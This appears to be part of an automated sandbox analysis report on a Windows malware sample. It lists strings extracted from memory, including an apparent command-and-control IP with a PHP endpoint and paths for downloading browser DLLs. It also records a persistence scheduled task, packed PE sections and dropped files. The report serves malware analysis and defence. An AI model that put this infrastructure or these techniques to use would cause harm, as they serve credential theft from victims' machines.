                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll5
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.000000000174F000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dllk
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllS
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllk
                        Source: cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.php
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.php8L
                        Source: cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.phpD
                        Source: cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.phpU
                        Source: cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.phpr
                        Source: cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/X
                        Source: cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/t
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: wqmnYoVbHr.exe, random[1].exe.13.dr, cb41bc9329.exe.13.drString found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
                        Source: wqmnYoVbHr.exe, random[1].exe.13.dr, cb41bc9329.exe.13.drString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
                        Source: wqmnYoVbHr.exe, random[1].exe.13.dr, cb41bc9329.exe.13.drString found in binary or memory: http://pki-ocsp.symauth.com0
                        Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323422296.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                        Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: GHJKECAAAFHJECAAAEBF.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
                        Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.drString found in binary or memory: https://support.mozilla.org
                        Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.drString found in binary or memory: https://www.mozilla.org
                        Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.drString found in binary or memory: https://www.mozilla.org#
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000005C8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000005C8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000006CA000.00000040.00000001.01000000.00000003.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000005C8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000006CA000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/-CH
                        Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000006CA000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
                        Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

                        System Summary

                        barindex
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name:
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name: .idata
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: .idata
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: explortu.exe.8.drStatic PE information: section name:
                        Source: explortu.exe.8.drStatic PE information: section name: .idata
                        Source: explortu.exe.8.drStatic PE information: section name:
                        Source: wqmnYoVbHr.exeStatic PE information: section name:
                        Source: wqmnYoVbHr.exeStatic PE information: section name:
                        Source: wqmnYoVbHr.exeStatic PE information: section name:
                        Source: wqmnYoVbHr.exeStatic PE information: section name:
                        Source: wqmnYoVbHr.exeStatic PE information: section name:
                        Source: random[1].exe.13.drStatic PE information: section name:
                        Source: random[1].exe.13.drStatic PE information: section name:
                        Source: random[1].exe.13.drStatic PE information: section name:
                        Source: random[1].exe.13.drStatic PE information: section name:
                        Source: random[1].exe.13.drStatic PE information: section name:
                        Source: cb41bc9329.exe.13.drStatic PE information: section name:
                        Source: cb41bc9329.exe.13.drStatic PE information: section name:
                        Source: cb41bc9329.exe.13.drStatic PE information: section name:
                        Source: cb41bc9329.exe.13.drStatic PE information: section name:
                        Source: cb41bc9329.exe.13.drStatic PE information: section name:
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C92B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C92B700
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C92B8C0 rand_s,NtQueryVirtualMemory,0_2_6C92B8C0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C92B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6C92B910
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C8CF280
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeFile created: C:\Windows\Tasks\explortu.jobJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8C35A00_2_6C8C35A0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8D6C800_2_6C8D6C80
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9234A00_2_6C9234A0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C92C4A00_2_6C92C4A0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8D64C00_2_6C8D64C0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8ED4D00_2_6C8ED4D0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C906CF00_2_6C906CF0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8CD4E00_2_6C8CD4E0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C905C100_2_6C905C10
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C912C100_2_6C912C10
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C93AC000_2_6C93AC00
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C93542B0_2_6C93542B
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8D54400_2_6C8D5440
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C93545C0_2_6C93545C
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C900DD00_2_6C900DD0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9285F00_2_6C9285F0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8DFD000_2_6C8DFD00
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8F05120_2_6C8F0512
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8EED100_2_6C8EED10
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C92E6800_2_6C92E680
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8E5E900_2_6C8E5E90
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C924EA00_2_6C924EA0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9376E30_2_6C9376E3
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8CBEF00_2_6C8CBEF0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8DFEF00_2_6C8DFEF0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C907E100_2_6C907E10
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9156000_2_6C915600
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C929E300_2_6C929E30
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C903E500_2_6C903E50
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8E46400_2_6C8E4640
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8E9E500_2_6C8E9E50
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C912E4E0_2_6C912E4E
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C936E630_2_6C936E63
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8CC6700_2_6C8CC670
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9177A00_2_6C9177A0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8CDFE00_2_6C8CDFE0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8F6FF00_2_6C8F6FF0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9077100_2_6C907710
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8D9F000_2_6C8D9F00
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8F60A00_2_6C8F60A0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9350C70_2_6C9350C7
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8EC0E00_2_6C8EC0E0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9058E00_2_6C9058E0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8D78100_2_6C8D7810
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C90B8200_2_6C90B820
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9148200_2_6C914820
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8E88500_2_6C8E8850
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8ED8500_2_6C8ED850
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C90F0700_2_6C90F070
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9051900_2_6C905190
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9229900_2_6C922990
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8CC9A00_2_6C8CC9A0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8FD9B00_2_6C8FD9B0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8EA9400_2_6C8EA940
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C91B9700_2_6C91B970
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C93B1700_2_6C93B170
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8DD9600_2_6C8DD960
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C93BA900_2_6C93BA90
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C932AB00_2_6C932AB0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8C22A00_2_6C8C22A0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8F4AA00_2_6C8F4AA0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8DCAB00_2_6C8DCAB0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C908AC00_2_6C908AC0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C90E2F00_2_6C90E2F0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8E1AF00_2_6C8E1AF0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C909A600_2_6C909A60
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8CF3800_2_6C8CF380
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9353C80_2_6C9353C8
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C90D3200_2_6C90D320
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8C53400_2_6C8C5340
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8DC3700_2_6C8DC370
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA9000014_2_7EA90000
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA9080414_2_7EA90804
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: String function: 6C8FCBE8 appears 134 times
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: String function: 6C9094D0 appears 90 times
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.000000000186A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe. vs wqmnYoVbHr.exe
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2323872861.000000006CB45000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs wqmnYoVbHr.exe
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs wqmnYoVbHr.exe
                        Source: wqmnYoVbHr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: wqmnYoVbHr.exeStatic PE information: Section: ZLIB complexity 0.9995236280487805
                        Source: wqmnYoVbHr.exeStatic PE information: Section: ZLIB complexity 0.99359130859375
                        Source: wqmnYoVbHr.exeStatic PE information: Section: ZLIB complexity 0.989501953125
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: Section: ZLIB complexity 0.9981541895604396
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: Section: kvnoqpwr ZLIB complexity 0.9948457731105089
                        Source: amadka[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9981541895604396
                        Source: amadka[1].exe.0.drStatic PE information: Section: kvnoqpwr ZLIB complexity 0.9948457731105089
                        Source: explortu.exe.8.drStatic PE information: Section: ZLIB complexity 0.9981541895604396
                        Source: explortu.exe.8.drStatic PE information: Section: kvnoqpwr ZLIB complexity 0.9948457731105089
                        Source: random[1].exe.13.drStatic PE information: Section: ZLIB complexity 0.9995236280487805
                        Source: random[1].exe.13.drStatic PE information: Section: ZLIB complexity 0.99359130859375
                        Source: random[1].exe.13.drStatic PE information: Section: ZLIB complexity 0.989501953125
                        Source: cb41bc9329.exe.13.drStatic PE information: Section: ZLIB complexity 0.9995236280487805
                        Source: cb41bc9329.exe.13.drStatic PE information: Section: ZLIB complexity 0.99359130859375
                        Source: cb41bc9329.exe.13.drStatic PE information: Section: ZLIB complexity 0.989501953125
